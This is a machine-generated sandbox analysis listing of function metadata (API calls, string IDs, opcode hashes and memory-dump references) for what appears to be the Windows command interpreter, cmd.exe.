                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 698b0477c31b57655b8129feebdd0b7bf6dc0c8220588d9c75094cd329cf8be1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93119122A1579B82EB50AB01A41403DFBA1FB8AF80BD99076DE4F03765DFBDE4418760

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f8285144374bbb89e131d7d8273940fb18d22798a679a0c343d3d7f73308b0f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35015B2190868BCAF704BB14E4542BCFAA0EB8AB55FD46172E94F033B1CFBCA044C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 13675d2372c316cd7a7c50d6965756c4bc3950d983800b2edb6765f6a99b1507
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31D623E1865B82F764BF15A44007EF661EB49B90FE48176DA4B873F0EEBDE8458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 354249369565cc9ef09f053ebda407e590cb74e6a014b37d15ae85d075e39d60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911C622A0864B81FB51EB55F1542BDA2909F85BA4FD84232DE6F4B7F5DEBDD4808320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4145adacbd372f8444f0baa456e0340d6b4c9ec16e6b1af03a09be9d7aa3917b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4518C21A0C24B49FF62BB25A45137DB3A19F44784FC64133DA0F862F5DEBCE8808671
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7D1525B52
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524297
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15242D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D15242FD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D1524368
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: wcsrchr.MSVCRT ref: 00007FF7D15243E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: lstrcmpW.KERNELBASE ref: 00007FF7D1524401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7D1525BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca4f8b397122741c5fcccfe2269068fe735008dd1e6df284b4b01d88ebfd9961
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72C0123170464F47FB1C7731645513D95A45B09201FC45479C507D22A2DDBCD4048610
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 10979a80bf34ff0989239b922509f9a63a90d24d5a349f4383df43e162f965fe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E0C2A3E2826B9AF7983A4170413FC9953CB68782FC440B3CB0FC12E0496D2C415228
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c5a1ef935451652ba15f2c70175c88724b831a707ff175dd80a81c0825bc7dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B422B0978A40FF409756B54016D92919B48BF0BD88332EA7E87BE5DE7CD4518300
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1388555566-2647954630
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca97c61ed8a4551062714c4efb30b93cb24ab0fa014687ed39a6ddc984746626
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAA28032A08B8B86FB50AB21A4542BDF6A1FB49784FD08136DA4F477B5DFBCD4448720
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
• String ID: &<|>$+: $:$:EOF$=,;$^
• API String ID: 511550188-726566285
• Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
• Instruction ID: 205a45c76b7e442c15cfddb256266c4ab5101c6fc3a1de5e3b3ec62384581d4b
• Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
• Instruction Fuzzy Hash: 8152BF22A0869B86F766AB15E41027DFAA0FF45B44FD58136D94F437B0DFBCE8918720
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr$wcstol
• String ID: delims=$eol=$skip=$tokens=$useback$usebackq
• API String ID: 1738779099-3004636944
• Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
• Instruction ID: a00b937a79521ff436a6a6840599a1e6fadbc548afcf7982894737f1b7940f60
• Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
• Instruction Fuzzy Hash: DC729322B0865B8AFB52AF65D0442BDB7A1BB44748FC14036DE0F577A4DFBDA884C320
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F44
• _get_osfhandle.MSVCRT ref: 00007FF7D1537F5C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F9E
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537FFF
